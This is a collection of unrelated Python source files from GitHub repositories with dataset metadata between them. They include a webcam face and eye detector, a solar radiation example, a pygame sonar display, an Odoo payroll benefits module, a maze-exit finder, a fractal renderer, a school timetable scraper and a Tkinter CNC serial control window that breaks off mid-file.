imutils\nimport dlib\nimport cv2\nimport os\n\n\nusingWebcam = True\nisMotionDetecting = False\nisFaceDetecting = True\n\n\nimage_width = 0\nimage_path = \"lena.bmp\"\n\n#This dat file is NOT MINE and NOT LICENSED for any use other than playing around personally!!\ndownload_path = 'http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2'\nshape_predictor_path = \"shape_predictor_68_face_landmarks.dat\"\nzip_path = download_path.split('/')[-1]\ntemp_path = zip_path+'.download'\nif not os.path.exists(shape_predictor_path) : \n import shutil\n import requests\n import bz2\n \n if not os.path.exists(zip_path):\n with open(temp_path,'wb') as face_dat_file :\n face_dat_data = requests.get(download_path)\n face_dat_file.write(face_dat_data.content)\n shutil.move(temp_path,zip_path)\n \n with bz2.open(zip_path,'rb') as zip_file:\n data = zip_file.read()\n\n with open(shape_predictor_path,'wb') as dat_file:\n dat_file.write(data)\n\n #Cleanup zip file\n os.remove(zip_path)\n\n# initialize dlib's face detector 
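# The shape-predictor download above buffers the whole .bz2 archive in memory before
# decompressing. A streaming variant of the same idea (a sketch using the same URL and
# output-path variables, not the original author's code):
def fetch_shape_predictor(url, out_path):
    import bz2
    import requests
    decompressor = bz2.BZ2Decompressor()
    with requests.get(url, stream=True) as response:
        response.raise_for_status()
        with open(out_path, 'wb') as dat_file:
            for chunk in response.iter_content(chunk_size=1 << 16):
                dat_file.write(decompressor.decompress(chunk))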
(HOG-based) and then create\n# the facial landmark predictor\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(shape_predictor_path)\n\n\nwindow_name = 'Face Detection'\nwindow = cv2.namedWindow(window_name,cv2.WINDOW_NORMAL)\ncap = cv2.VideoCapture(0)\n\nif image_width : first_image = imutils.resize(cap.read()[1],width=image_width)\nelse : first_image = cap.read()[1]\nold_frame = cv2.cvtColor(first_image,cv2.COLOR_BGR2GRAY)\nolder_frame = old_frame.copy()\n\nif not image_width : image_width = old_frame.shape[1]\neye_weight = 0.5\nwhile True:\n # load the iscipyut image, resize it, and convert it to grayscale\n if usingWebcam:\n _,image = cap.read()\n else:\n image = cv2.imread(image_path)\n\n\n image = imutils.resize(image, width=image_width)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\n if isMotionDetecting :\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n\n blur = cv2.GaussianBlur( older_frame ,(3,3),3)\n\n for i in range(3): blur = cv2.GaussianBlur(blur,(3,3),3)\n\n #grad = cv2.morphologyEx(blur,cv2.MORPH_GRADIENT,kernel)\n\n motion_image = ( blur - blur.min() ).astype(float)\n #motion_image-= motion_image.min()\n sub_image = cv2.erode(motion_image,kernel,iterations=1).astype(float)\n\n sub_image += gray.astype(float)\n sub_image = (255 * sub_image/sub_image.max() ).astype(scipy.uint8)\n\n\n older_frame = (older_frame + old_frame)/2\n old_frame = ( old_frame + sub_image)/2\n\n sub_image = cv2.applyColorMap( sub_image ,cv2.COLORMAP_JET)\n\n else:\n sub_image = image\n\n rects = []\n if isFaceDetecting:\n # detect faces in the grayscale image\n rects = detector(gray, 1)\n\n # loop over the face detections\n for (i, rect) in enumerate(rects):\n \t# determine the facial landmarks for the face region, then\n \t# convert the landmark (x, y)-coordinates to a NumPy array\n\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n output = sub_image # face_utils.visualize_facial_landmarks(sub_image, shape)\n\n #loop over the face parts individually\n eyes_location = []\n eyes_area = []\n xs,ys = [],[]\n for (name, (i, j)) in face_utils.FACIAL_LANDMARKS_IDXS.items():\n # extract the ROI of the face region as a separate image\n bbox = cv2.boundingRect(scipy.array([shape[i:j]]))\n (x, y, w, h) = bbox\n xs.append(x) ; xs.append(x+w)\n ys.append(y) ; ys.append(y+h)\n\n if 'eye' in name and not 'brow' in name:\n eyes_location.append(bbox)\n eyes_area.append(w*h)\n\n eye_idx = scipy.argmax(eyes_area)\n eye_weight = 0.25*eye_idx + 0.75*eye_weight\n eye_idx = int(round(eye_weight))\n\n (x, y, w, h) = eyes_location[eye_idx]\n xr,yr = int(w/2),int(h/2)\n xc,yc = x+xr,y+yr\n cv2.rectangle(output,(x,y),(x + w , y + h),(0,255,0),3)\n cv2.ellipse(output,(xc,yc),(xr,yr),0,0,360,255,-1)\n\n eye_idx = not eye_idx\n (x, y, w, h) = eyes_location[eye_idx]\n xr,yr = int(w/2),int(h/2)\n xc,yc = x+xr,y+yr\n cv2.rectangle(output,(x,y),(x + w , y + h),(0,0,255),3)\n cv2.ellipse(output,(xc,yc),(xr,yr),0,0,360,255,-1)\n\n #Face rect\n minx,maxx = min(xs),max(xs)\n miny,maxy = min(ys),max(ys)\n miny = int(max(0,miny - 0.2 * (maxy-miny)))\n cv2.rectangle(output,(minx,miny),(maxx ,maxy),(0,255,0),3)\n\n\n \t# visualize all facial landmarks with a transparent overlay\n cv2.imshow(window_name, output)\n\n if not len(rects) or not isFaceDetecting : cv2.imshow(window_name, sub_image)\n\n\n\n\n keyPress = 
cv2.waitKey(1)\n\n\n","repo_name":"PhysicistJohn/eyeAF","sub_path":"detect_face_parts.py","file_name":"detect_face_parts.py","file_ext":"py","file_size_in_byte":5274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3000631825","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nExample for solar radiation on a tilted surface.\n\"\"\"\n\nfrom __future__ import division\n\nimport matplotlib.pyplot as plt\n\nimport pycity_base.classes.timer\nimport pycity_base.classes.weather\nimport pycity_base.classes.environment\n\n\ndef run_example(do_plot=False):\n # Create environment\n # Initialize the timer object for a full year computation, without rolling\n # horizon and hourly time discretization\n timer = pycity_base.classes.timer.Timer(3600, 8760, 8760, 8760)\n weather = pycity_base.classes.weather.Weather(timer)\n environment = pycity_base.classes.environment.Environment(timer, weather, None)\n\n # Surface definition\n beta = 30 # Slope, degree (not radians)\n gamma = 0 # Azimuth angle, degree (not radians)\n\n # Compute solar radiation on a tilted surface\n function = weather.getRadiationTiltedSurface\n solar_radiation_tilted_surface = function(beta, gamma, update=True)\n\n # The result is a tuple with four entries:\n # 0. Total radiation on the given surface\n # 1. Diffuse radiation on the given surface\n # 2. Direct radiation on the given surface\n # 3. Reflected radiation from the ground on the given surface\n # (The total radiation (index 0) is the sum of the other three)\n\n total_radiation = solar_radiation_tilted_surface[0]\n diffuse_radiation = solar_radiation_tilted_surface[1]\n direct_radiation = solar_radiation_tilted_surface[2]\n reflected_radiation = solar_radiation_tilted_surface[3]\n\n if do_plot:\n fig = plt.figure()\n fig.add_subplot(411)\n plt.plot(total_radiation)\n plt.ylabel('total_radiation')\n fig.add_subplot(412)\n plt.plot(diffuse_radiation)\n plt.ylabel('diffuse_radiation')\n fig.add_subplot(413)\n plt.plot(direct_radiation)\n plt.ylabel('direct_radiation')\n fig.add_subplot(414)\n plt.plot(reflected_radiation)\n plt.ylabel('reflected_radiation')\n plt.show()\n\n\nif __name__ == '__main__':\n run_example(do_plot=True)\n","repo_name":"RWTH-EBC/pyCity","sub_path":"pycity_base/examples/example_solar_radiation_tilted_surface.py","file_name":"example_solar_radiation_tilted_surface.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"24242197888","text":"#SonarGUI.py\n#Draws a GUI to the screen with\n#symbols to indicate sonar readings.\nimport sys, pygame\nfrom time import sleep\nclass SonarGUI:\n def __init__(self, scr):\n \n ###Draw the frame on the screen###\n self.screen = scr\n self.GREY = 50, 50, 50\n self.screen.fill(self.GREY)\n pygame.display.set_caption('Robot Control Interface')\n botImg = pygame.image.load(\"bot.png\")\n self.warnImg = pygame.image.load(\"warning.png\")\n self.okImg = pygame.image.load(\"ok.png\")\n self.qImg = pygame.image.load(\"q.png\")\n pygame.display.flip()\n #0 1 2 3\n #RF LF RB LB\n self.imgPositions = [(384, 0), (0, 0), (384, 384), (0, 384)]\n self.screen.blit(botImg, (107, 107))\n pygame.event.set_allowed(pygame.QUIT)\n pygame.mixer.music.load(\"buzzer.mp3\")\n ###################################\n self.OK = 0\n self.CLOSE = 1\n self.FAR = 2\n self.sonars = [self.FAR, self.FAR, self.FAR, self.FAR]\n for i in range(len(self.sonars)):\n 
self.screen.blit(self.qImg, self.imgPositions[i])\n pygame.display.flip()\n def updateSonars(self, readings):\n pygame.mixer.music.rewind()\n for i in range(len(self.sonars)):\n if self.sonars[i] != readings[i]: #Only update if it changes\n if readings[i] is self.OK:\n pygame.draw.rect(self.screen, self.GREY,pygame.Rect(self.imgPositions[i], (128, 128))) #Draw a rect over it\n self.screen.blit(self.okImg, self.imgPositions[i])\n self.sonars[i] = self.OK\n elif readings[i] is self.CLOSE:\n pygame.draw.rect(self.screen, self.GREY,pygame.Rect(self.imgPositions[i], (128, 128))) #Draw a rect over it\n self.screen.blit(self.warnImg, self.imgPositions[i])\n self.sonars[i] = self.CLOSE\n pygame.mixer.music.play() #Play warning sound\n elif readings[i] is self.FAR:\n pygame.draw.rect(self.screen, self.GREY,pygame.Rect(self.imgPositions[i], (128, 128))) #Draw a rect over it\n self.screen.blit(self.qImg, self.imgPositions[i])\n self.sonars[i] = self.FAR \n pygame.display.flip()\n\n","repo_name":"josephvcaustin/SeniorDesign2","sub_path":"Operator Side/SonarGUI.py","file_name":"SonarGUI.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42630887292","text":"# coding: utf-8\nfrom datetime import datetime\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT\nfrom dateutil.relativedelta import relativedelta\nfrom odoo import models, fields, api, _\nimport calendar\nfrom odoo.exceptions import UserError, ValidationError\n\nclass hr_tiempo_servicio(models.Model):\n _name = 'hr.payroll.prestaciones'\n _description = 'Tabla de Prestaciones'\n\n company_id = fields.Many2one(\"res.company\", string=\"Compañia\", default=lambda self: self.env.company)\n employee_id=fields.Many2one(\"hr.employee\",string=\"Empleado\")\n ano= fields.Integer()\n mes = fields.Integer(string='Mes cumplido')\n nro_mes = fields.Integer()\n sueldo_int_mensual = fields.Float()\n nro_ano = fields.Integer()\n dias_disfrutes = fields.Integer(string='Dias de prestaciones')\n alicuota = fields.Float()\n retiros = fields.Float()\n acumulado = fields.Float()\n\nclass HrPayslip(models.Model):\n _inherit = 'hr.payslip'\n\n ultimo_suldo_base_mensual = fields.Float()\n\n\n def action_payslip_done(self):\n #raise UserError(_('Prueba BEBE'))\n res = super(HrPayslip, self).action_payslip_done()\n sueldo_base_mensual=0.0001\n nro_ano=dias_disfrutes=alicuota=acumulado=0\n mes=0\n mes_nomina=self.mes(self.date_to)\n ano_actual=self.ano(self.date_to)\n valida=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('ano','=',ano_actual),('nro_mes','=',mes_nomina)])\n if not valida:\n if self.contract_id.wage>0:\n sueldo_base_mensual=self.contract_id.wage\n self.ultimo_suldo_base_mensual=sueldo_base_mensual\n if self.tiempo_antiguedad>0:\n nro_ano=self.tiempo_antiguedad\n indicadores=self.env['hr.payroll.indicadores.economicos'].search([('code','=','DUT')])\n if indicadores:\n for det_indi in indicadores:\n nro_dias_utilidades=det_indi.valor\n verifica=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('id','!=',self.id)],order=\"mes ASC\") #('ano','=',ano_actual)\n if verifica:\n #raise UserError(_('Ya hay una nomina procesada/pagada en el mes seleccionado para %s')%self.employee_id.name)\n for det_v in verifica:\n #acumulado=det_v.alicuota\n if det_v.mes==11:\n mes=0\n else:\n mes=det_v.mes+1\n if mes==3 or mes==6 or mes==9:\n dias_disfrutes=15\n if mes==0:\n 
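# A standalone sketch of the "sueldo integral" formula applied below: the integral
# monthly wage is the daily base wage plus daily fractions of the vacation days and the
# year-end bonus ("utilidades") days, scaled back to a 30-day month:
def sueldo_integral_mensual(sueldo_base_mensual, dias_vacaciones, nro_dias_utilidades):
    sueldo_base_diario = sueldo_base_mensual / 30
    fraccion_vacaciones = sueldo_base_diario * dias_vacaciones / 360
    fraccion_utilidades = sueldo_base_diario * nro_dias_utilidades / 360
    return (sueldo_base_diario + fraccion_vacaciones + fraccion_utilidades) * 30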
busca_mes=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('mes','=','0'),('id','!=',self.id)],order=\"mes ASC\")\n if busca_mes:\n dias_disfrutes=15\n if not busca_mes:\n dias_disfrutes=0\n #if self.tiempo_antiguedad==0:\n #dias_disfrutes=15\n #if self.tiempo_antiguedad>0:\n #dias_disfrutes=self.dias_vacaciones+1\n sueldo_base_diario=sueldo_base_mensual/30\n fraccion_diaria_vaca=sueldo_base_diario*self.dias_vacaciones/360\n fraccion_diaria_utilidades=sueldo_base_diario*nro_dias_utilidades/360\n sueldo_integral_mensual=(sueldo_base_diario+fraccion_diaria_vaca+fraccion_diaria_utilidades)*30\n\n alicuota=(sueldo_integral_mensual/30)*dias_disfrutes\n acumulado=self.compute_acumulado()+alicuota\n\n ret = self.env['hr.payroll.prestaciones']\n values = {\n 'employee_id': self.employee_id.id,\n 'sueldo_int_mensual':sueldo_integral_mensual,\n 'nro_ano':nro_ano,\n 'mes':mes,\n 'nro_mes':mes_nomina,\n 'ano':self.ano(self.date_to),\n 'dias_disfrutes':dias_disfrutes,\n 'alicuota':alicuota,\n 'acumulado':acumulado,\n }\n rets=ret.create(values)\n\n def compute_acumulado(self):\n acum=0\n lista=self.env['hr.payroll.prestaciones'].search([('employee_id','=',self.employee_id.id),('id','!=',self.id),('nro_mes','!=',self.mes(self.date_to))])\n if lista:\n for det in lista:\n acum=acum+det.alicuota\n return acum\n\n def mes(self,date):\n fecha = str(date)\n fecha_aux=fecha\n mes=fecha[5:7]\n resultado=mes\n return int(resultado)\n\n def ano(self,date):\n fecha = str(date)\n fecha_aux=fecha\n ano=fecha_aux[0:4] \n resultado=ano\n return int(resultado)\n","repo_name":"jeffryjdelarosa/nomina_localizacion","sub_path":"hr_campos_parametrizacion/models/hr_prestaciones.py","file_name":"hr_prestaciones.py","file_ext":"py","file_size_in_byte":4628,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23671140518","text":"from enthought.traits.api import HasTraits, Range\n\n#--[Code]-----------------------------------------------------------------------\n\nclass GUISlider (HasTraits):\n\n def __init__(self, eval=None, label='Value', \n trait=None, min=0.0, max=1.0, \n initial=None, **traits):\n HasTraits.__init__(self, **traits)\n if trait is None:\n if min > max: \n min, max = max, min\n if initial is None:\n initial = min \n elif not (min <= initial <= max):\n initial = [min, max][\n abs(initial - min) > \n abs(initial - max)]\n trait = Range(min, max, value = initial)\n self.add_trait(label, trait)\n \n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/Traits/examples/tutorials/doc_examples/examples/object_trait_attrs.py","file_name":"object_trait_attrs.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"18362417404","text":"from surgical_robotics_challenge.simulation_manager import SimulationManager\nfrom PyKDL import Vector, Rotation, Frame\nfrom surgical_robotics_challenge.utils.utilities import cartesian_interpolate_step\nimport numpy as np\nimport time\nfrom surgical_robotics_challenge.utils import coordinate_frames\n\n\nclass NeedleInitialization:\n def __init__(self, simulation_manager):\n self.T_needle_psmtip = coordinate_frames.Needle.T_center_psmtip\n self.T_needle_psmtip_far = self.T_needle_psmtip * Frame(Rotation.RPY(0., 0., 0.), Vector(0., 0., -0.010))\n\n self.needle = simulation_manager.get_obj_handle('Needle')\n time.sleep(1.0)\n self._release = False\n self._reached = False\n\n def 
get_tip_to_needle_offset(self):\n return self.T_needle_psmtip\n\n def move_to(self, psm_tip):\n print('Moving Needle to PSM 2 Tip')\n self._release = False\n if psm_tip is None:\n print('Not a valid link, returning')\n return\n T_nINw = self.needle.get_pose()\n T_tINw = psm_tip.get_pose()\n # First reach the farther point\n self._reached = False\n done = False\n while not done:\n T_nINw_cmd = T_tINw * self.T_needle_psmtip_far\n T_delta, done = cartesian_interpolate_step(T_nINw, T_nINw_cmd, 0.01, 0.005)\n r_delta = T_delta.M.GetRPY()\n # print(error_max)\n T_cmd = Frame()\n T_cmd.p = T_nINw.p + T_delta.p\n T_cmd.M = T_nINw.M * Rotation.RPY(r_delta[0], r_delta[1], r_delta[2])\n T_nINw = T_cmd\n self.needle.set_pose(T_cmd)\n time.sleep(0.01)\n\n time.sleep(0.5)\n done = False\n T_nINw = self.needle.get_pose()\n T_tINw = psm_tip.get_pose()\n while not done:\n T_nINw_cmd = T_tINw * self.T_needle_psmtip\n T_delta, done = cartesian_interpolate_step(T_nINw, T_nINw_cmd, 0.01, 0.005)\n r_delta = T_delta.M.GetRPY()\n T_cmd = Frame()\n T_cmd.p = T_nINw.p + T_delta.p\n T_cmd.M = T_nINw.M * Rotation.RPY(r_delta[0], r_delta[1], r_delta[2])\n T_nINw = T_cmd\n self.needle.set_pose(T_cmd)\n time.sleep(0.01)\n\n self._reached = True\n\n def release(self):\n print('Releasing Needle')\n self._release = True\n self.needle.set_force(Vector(0, 0, 0))\n self.needle.set_torque(Vector(0, 0, 0))\n\n def has_reached(self):\n return self._reached\n\n","repo_name":"surgical-robotics-ai/surgical_robotics_challenge","sub_path":"scripts/surgical_robotics_challenge/utils/task3_init.py","file_name":"task3_init.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"31122435143","text":"filename = 'mobydick.txt'\n\ntry:\n\twith open (filename, encoding= 'utf-8') as f:\n\t\tcontents = f.read()\nexcept FileNotFoundError:\n\tprint(f\"sorry, the file {filename} does not exist.\")\nelse:\n\twords = contents.lower().count('the ')\n\tprint(f\"The file {filename} has about {words} words saying 'the'.\")\n\n\n","repo_name":"StephanieLoomans/learning_python","sub_path":"common_words.py","file_name":"common_words.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19098245392","text":"class Solution:\n def minNumber(self, nums1: List[int], nums2: List[int]) -> int:\n nset=set(nums1)&set(nums2)\n if nset:\n return min(nset)\n else:\n first=min(nums1)\n second=min(nums2)\n if first>second:\n return int(str(second)+str(first))\n else:\n return int(str(first)+str(second))\n \n ","repo_name":"kalebwondimu33/LeetcodeSolutions","sub_path":"2605-form-smallest-number-from-two-digit-arrays/2605-form-smallest-number-from-two-digit-arrays.py","file_name":"2605-form-smallest-number-from-two-digit-arrays.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22716970623","text":"\"\"\"\n Finds the exit of the labyrinth\n Current solution: Find the spaces on the ouside not occupied by an obstacle\n Then look which one is reachable\n\"\"\"\nimport Pathfinding.A_Star as A_Star\nimport numpy as np\n\n\ndef scan(grid):\n exits = []\n\n # loops trough the outer frame of the grid an looks for free spaces\n for y in range(len(grid)):\n if grid[y][0] == 0:\n exits.append((0, y))\n if grid[y][grid.shape[1]-1] == 0:\n exits.append((grid.shape[1]-1, y))\n\n for x 
in range(grid.shape[1]):\n if grid[0][x] == 0:\n exits.append((x, 0))\n if grid[grid.shape[0]-1][x] == 0:\n exits.append((x, grid.shape[0]-1))\n\n # solves the path to the possible exits\n paths = []\n for pos in exits:\n current_grid = grid\n current_grid[pos[1]][pos[0]] = 3\n\n a_star_algorithm = A_Star.AStar(grid)\n path = a_star_algorithm.solve()\n if path:\n paths.append(a_star_algorithm.get_directions())\n\n # Takes the shortest one by comparing to the current path\n # (Beginning Value: longest path on a empty grid)\n shortest_path = np.zeros(shape=(grid.shape[0] * grid.shape[1], 1))\n for path in paths:\n shortest_path = path if len(path) < len(shortest_path) else shortest_path\n\n return shortest_path\n","repo_name":"Klark007/Selbstfahrendes-Auto-im-Modell","sub_path":"Pathfinding/Find_Exit.py","file_name":"Find_Exit.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"650123210","text":"import threading\nimport queue\nfrom complex import Complex, is_prisonier\nimport numpy as np\nfrom PIL import Image\nfrom tqdm import tqdm\nimport time\n\ndim = 2000\nn_thread = 1\n\ndiv = 2.5 / (dim/2)\nwidth = dim\nheigth = dim\n\nc = Complex.from_algebra(-1.2, 0)\n\n\nq = queue.Queue()\nend = np.zeros((width,heigth, 3))\ndef worker():\n dones = 0\n while True:\n x,y = q.get()\n z0 = Complex.from_algebra(x*div,y*div)\n end[int(x+width/2),int(y+heigth/2)] = is_prisonier(z0, c)[1]\n dones+=1\n if dones % int(dim**2 / 30) == 0:\n print(f\"[{threading.current_thread().getName()}] done {dones/n_thread/(dim**2)*100:.3}%\")\n q.task_done()\n\nfor i in range(n_thread):\n threading.Thread(target=worker, daemon=True).start()\n\nfor x in tqdm(range(int(-width/2), int(width/2), 1)):\n for y in range(int(-heigth/2), int(heigth/2), 1):\n q.put((x,y))\n\nq.join()\nprint('Fini les calules')\n","repo_name":"davidpcrd/julia-fractals","sub_path":"thread_fractal.py","file_name":"thread_fractal.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7048027239","text":"import urllib3, sqlite3\nfrom bs4 import BeautifulSoup\nfrom datetime import date, datetime\n\nurl = 'http://www.jkg-stuttgart.de/jkgdata/vertretungsplan/sa3_7a.htm'\nhttp = urllib3.PoolManager()\nresponse = http.request('GET', url)\ncreated_at = datetime.now()\n\nsoup = BeautifulSoup(response.data, 'html.parser')\n\ntable = soup.find('table', attrs = {'rules': 'all'})\n\ndata = []\nrows = table.find_all('tr')\nfor row in rows:\n\tcols = row.find_all('td')\n\tcols = [ele.text.strip() for ele in cols]\n\tcols = [created_at] + cols\n\tdata.append(cols)\n\n#print(data)\ndata = data[1:] #header entfernen\n\ndb = sqlite3.connect('jkgscrapedb.db', detect_types=sqlite3.PARSE_DECLTYPES|sqlite3.PARSE_COLNAMES)\ncursor = db.cursor()\ncursor.execute('CREATE TABLE IF NOT EXISTS rawdata (created_at timestamp, tag text, klassen text, fach text, stunde text, lehrer text, raum text, grund, text, vertretungs_text text, art text, verlegt_von text, ndruck text)')\n\n\ncursor.executemany(\"INSERT INTO rawdata(created_at, tag, klassen, fach, stunde, lehrer, raum, grund, vertretungs_text, art, verlegt_von, ndruck) VALUES(?,?,?,?,?,?,?,?,?,?,?,?)\", 
data)\n\ndb.commit()\ndb.close()","repo_name":"tfreitag98/jkgscrape","sub_path":"jkgscrape.py","file_name":"jkgscrape.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71591039847","text":"from tkinter import Tk, Toplevel,Frame,ttk,Text,DISABLED,Entry,NORMAL,Button\nimport serial.tools.list_ports\nfrom os import system, path, remove\nfrom pathlib import Path\nfrom time import sleep\nfrom sys import exit\nimport threading\nimport json\n\n# import pyvista as pv\n# from pyvistaqt import BackgroundPlotter,QtInteractor\n# import numpy as np\n\nfrom widgets import CustomMenuBar,CustomMenu\nfrom widgets import Plotter_Frame,DRO_Frame,Serial_Console_Frame,Warning_Frame,Manual_Control_Frame\nfrom widgets import Status_Bar\nfrom serial_connection import serial_port\n\nclass RootWindow(Tk):\n\n def __init__(self,title):\n super().__init__()\n self.main_window=MainWindow(self,title)\n self.main_window.overrideredirect(1)\n self.attributes(\"-alpha\",0.0)\n\n def onRootIconify(event):self.main_window.withdraw()\n self.bind(\"\",onRootIconify)\n def onRootDeiconify(event):\n self.main_window.deiconify()\n self.main_window.lift()\n self.bind(\"\",onRootDeiconify)\n self.bind(\"\",onRootDeiconify)\n\n self.main_window.lift()\n\nclass MainWindow(Toplevel):\n\n def __init__(self,parent,title):\n\n super().__init__(parent)\n self.parent=parent\n self.title(title)\n self.width=self.winfo_screenwidth()\n self.height=self.winfo_screenheight()\n self.geometry(\"{}x{}+{}+{}\".format(self.width,self.height,0,0))\n self.resizable(False,False)\n self.menubar_bg=\"#2b2b2b\"\n self.sidebars_bg=\"#303030\"\n self.window_bg=\"#1b1b1b\"\n self.file_item_bg=\"#404040\"\n self.configure(background=self.window_bg)\n\n self.maximized=False\n\n self.connection=serial_port()\n\n self.MAX_FPS=30\n \n #encryption key\n self.key=None\n\n #file_options flag\n self.file_options_menu=None\n\n #load settings\n with open(\"settings.json\",\"r\") as f:\n self.settings=json.load(f)\n\n #menubar\n self.menubar=CustomMenuBar(self,self.width,30,self.menubar_bg)\n self.menubar.place(x=0,y=0)\n\n # file menu\n self.file_menu=CustomMenu(self,bg=self.menubar_bg)\n self.file_menu.add_menu_item(label=\"Open GCode File\")\n self.menubar.add_menu(label=\"File\",menu=self.file_menu)\n\n # #Settings menu\n self.settings_menu=CustomMenu(self,bg=self.menubar_bg)\n # self.settings_menu.add_menu_item(label=\"Change key\",command=self.change_key)\n # self.settings_menu.add_menu_item(label=\"Export Key\")\n # self.settings_menu.add_menu_item(label=\"Import Key\")\n # self.settings_menu.add_menu_item(label=\"Destroy vault\")\n # self.settings_menu.add_menu_item(label=\"Export vault\")\n # self.settings_menu.add_menu_item(label=\"Import vault\")\n self.menubar.add_menu(label=\"Settings\",menu=self.settings_menu)\n\n # tools menu\n self.tools_menu=CustomMenu(self,bg=self.menubar_bg)\n self.menubar.add_menu(label=\"Tools\",menu=self.tools_menu)\n\n # status bar\n self.status_bar=Status_Bar(self,width=self.width-10,height=30)\n self.status_bar.place(x=5,y=self.height-35)\n self.status_bar.set_text('Disconnected')\n # self.status_bar=Frame(self)\n # self.status_bar.configure(width=self.width-10,height=30)\n # self.status_bar.place(x=5,y=self.height-35)\n\n # home frame\n # port + baudrate +connect/disconnect buttons at the top\n # then 3 columns for console+serial log, DRO, graphic representation\n # below that, manual control and surface mapping \n \n \n 
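# The three-column layout built below gives each pane (frame_width - 40) // 3 pixels,
# leaving four 10 px gutters; a quick check of that arithmetic (the example width is an
# assumption, the real value is screen-dependent):
frame_w = 1900
pane = (frame_w - 40) // 3
xs = [10, 20 + pane, 30 + 2 * pane]
assert xs[-1] + pane <= frame_w - 10  # right-hand gutter is preserved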
self.home_frame=Frame(self)\n self.home_frame_w=self.width-10\n self.home_frame_h=self.height-75\n self.home_frame.configure(width=self.home_frame_w,height=self.home_frame_h)\n self.home_frame.place(x=5,y=35)\n\n # port selecttion\n port_list=[]\n for port in serial.tools.list_ports.comports():\n port_list.append(port.device)\n self.port_dropdown=ttk.Combobox(self.home_frame,state='readonly',values=port_list)\n self.port_dropdown.current(0)\n self.port_dropdown.place(x=10,y=10,height=25)\n\n # baud selection\n self.baud_dropdown=ttk.Combobox(self.home_frame,state='readonly',values=['9600','14400','19200','38400','57600','115200','250000'])\n self.baud_dropdown.current(0)\n self.baud_dropdown.place(x=20+self.port_dropdown.winfo_reqwidth(),y=10,height=25)\n\n # connect/disconnect button\n self.connect_btn=ttk.Button(self.home_frame,text=\"Connect\",command=self.connect)\n self.connect_btn.place(x=30+self.baud_dropdown.winfo_reqwidth()+self.port_dropdown.winfo_reqwidth(),y=10)\n\n # serial console\n self.serial_console=Serial_Console_Frame(self.home_frame,self.connection,width=(self.home_frame_w-40)//3,height=(self.home_frame_h-40)//2)\n self.serial_console.place(x=10,y=40)\n\n # Graphic representation\n self.plotter_frame=Plotter_Frame(self.home_frame,width=(self.home_frame_w-40)//3,height=(self.home_frame_h-40)//2)\n self.plotter_frame.place(x=20+self.serial_console.winfo_reqwidth(),y=40)\n\n # \"DRO\" and homming\n self.dro_frame=DRO_Frame(self.home_frame,width=(self.home_frame_w-40)//3,height=(self.home_frame_h-40)//2)\n self.dro_frame.place(x=30+self.serial_console.winfo_reqwidth()+self.plotter_frame.winfo_reqwidth(),y=40)\n self.dro_frame.set_process_command_funtion(self.serial_console.send_command)\n\n # # self.test_warning=Warning_Frame(self.home_frame,warning_message=\"This is a warning\",width=500,height=200)\n # # self.test_warning.place(x=(self.width-500)//2,y=(self.height-200)//2)\n\n\n self.manual_control=Manual_Control_Frame(self.home_frame,width=260,height=235)\n self.manual_control.place(x=self.home_frame_w-270,y=50+((self.home_frame_h-40)//2))\n self.manual_control.set_command_handler(self.serial_console.send_command)\n\n self.bind('',self.quit)\n\n self.update_frames()\n\n def update_frames(self):\n if self.connection.is_connected():\n self.dro_frame.update_frame(self.serial_console.get_machine_pos())\n self.after(1000,self.update_frames)\n\n\n def connect(self):\n if not self.connection.is_connected():\n self.connection.config(port=self.port_dropdown.get(),baudrate=self.baud_dropdown.get())\n self.connection.connect()\n self.serial_console.connect()\n # self.serial_console.update_console()\n self.status_bar.set_text(f'Connected: {self.port_dropdown.get()}, {self.baud_dropdown.get()}')\n self.connect_btn.config(text=\"Disconnect\")\n else:\n self.connection.disconnect()\n self.status_bar.set_text('Disconnected')\n self.connect_btn.config(text=\"Connect\")\n self.serial_console.write_to_console('DISCONNECTED')\n \n # def load_graphics(self):\n # # Create a PyVista QtInteractor\n\n # self.plotter = BackgroundPlotter(window_size=(200,100))\n # self.plotter.renderer.background_color = \"white\"\n\n\n # # Define the dimensions of the grid\n # x_min, x_max = 0,20\n # y_min, y_max = 0,10\n # n_points = 200 # Adjust this to match the grid you generated\n\n # # Create a grid of x and y values\n # x_grid = np.linspace(x_min, x_max, n_points)\n # y_grid = np.linspace(y_min, y_max, n_points)\n # x_grid, y_grid = np.meshgrid(x_grid, y_grid)\n\n # # Define a function for the flat surface 
